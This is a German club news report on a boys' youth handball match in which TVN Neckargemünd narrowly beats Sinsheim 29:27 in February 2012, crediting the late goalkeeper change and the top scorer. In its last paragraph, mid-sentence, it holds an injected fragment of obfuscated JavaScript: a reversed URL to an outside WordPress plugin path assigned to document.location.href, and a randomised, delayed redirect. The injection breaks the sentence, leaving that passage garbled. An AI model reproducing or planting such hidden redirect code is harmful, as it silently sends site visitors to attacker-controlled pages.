D-Jugend: Knapper Sieg nach großartigem Kampf

Am Samstagmorgen, 11.02.2012, traf die männliche Neckargemünder D-Jugend in ihrem vorletzten Rundenspiel auf die Mannschaft aus Sinsheim. Nach einem bis zum Ende spannenden Spiel konnten die Jungs des TVN einen knappen aber verdienten Auswärtssieg einfahren – dank starker kämpferischer Leistung und eines am Ende überragenden Torwarts.

Sinsheim, 11.02.2012 (tho) – Die Sinsheimer überraschten mit einer extrem offensiven Anfangsphase in der ersten Halbzeit. Zwar gingen der TVN schnell mit 3:6 in Führung, doch per Manndeckung versuchten die Sinsheimer Spieler den TVN zu ärgern. In der Abwehr fand man kein Mittel gegen die starken, platzierten Rückraumwürfe. Im Angriff schien man vergessen zu haben, dass prellen erlaubt ist und Tore schießen zum Spiel gehört. So konnte Sinsheim noch einmal auf 11:11 herankommen, ehe sich die TVN-Jungs fingen und bis zum Ende der ersten Halbzeit einen Vorsprung von 12:19 herausspielten.

Nach der Pausenansprache, in der alle Fehler nochmal in Ruhe angesprochen wurden, ging die Mannschaft konzentrierter in die zweite Halbzeit. Weiterhin kein Mittel fanden die Spieler allerdings gegen die starken Rückraumschützen und den schnellen, wendigen Kreisläufer. So kam Sinsheim bis auf 20:25 heran. In dieser Phase war der Neckargemünder Angriff teilweise unkonzentriert und auch unkoordiniert. Bälle wurden teils unüberlegt und wahllos abgespielt. Durch die zahlreichen technischen Fehler machte der TVN es der Mannschaft aus Sinsheim einfach. Diese nutzte jeden einzelnen Fehlpass gnadenlos aus und feuerten uns einen Konter nach dem anderen in den Kasten.

Wendepunkt: Ein Wechsel im Tor

Beim 25:27 wechselte Neckargemünd noch mal den Torwart – der wichtigste Schritt in dem heißen und knappen Spiel. Leon Maier hatte einen überragenden Tag und bekam bei jedem Torwurf seine Finger dran. So hielt er den TVN-Kasten in den letzten Minuten weitestgehend sauber. Er bewahrte selbst in den letzten 15 Sekunden einen kühlen Kopf, als ein weiterer Fehlpass den Sinsheimern in die Hände fiel. Leon hielt den Ball und bewahrte Neckargemünd vor einem noch knapperen Sieg oder gar einem Unentschieden.

Letztlich gewann die männliche Neckargemünder D-Jugend jedoch glücklich mit 27:29 und konnte damit den Vorsprung in der Tabelle weiter ausbauen. Die Mannschaft kann sich insbesondere bei Till Schwarz, mit 15 Toren Torschützenkönig dieser Partie, sowie Torwart Leon Maier bedanken. Gekämpft haben jedoch alle Spieler. Schließlich ist ein Sieg im Handballsport immer die Leistung einer ganzen Mannschaft. Die TVN-Jungs haben hier toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toll zusammengespielt, gekämpft und schlußendlich Sinsheim bezwungen. Ein riesengroßer Dank geht vor allem an die begleitenden Eltern, die uns wieder einmal großartig unterstützt haben!

 

Trainer & BetreuerTheresa Hoffmann, Luca Liedvogel

Für den TVN spielten:

Felix Molter (4); Leo Vetter (Tor); Till Schwarz (15); Nicolas Kammler (Tor); Emil Vetter (3); Felix Schaum (2); Johannes Schaum; Leon Maier (2 und Tor); Lennart Tabel (n.e.); Jordi Winnikes (4/1)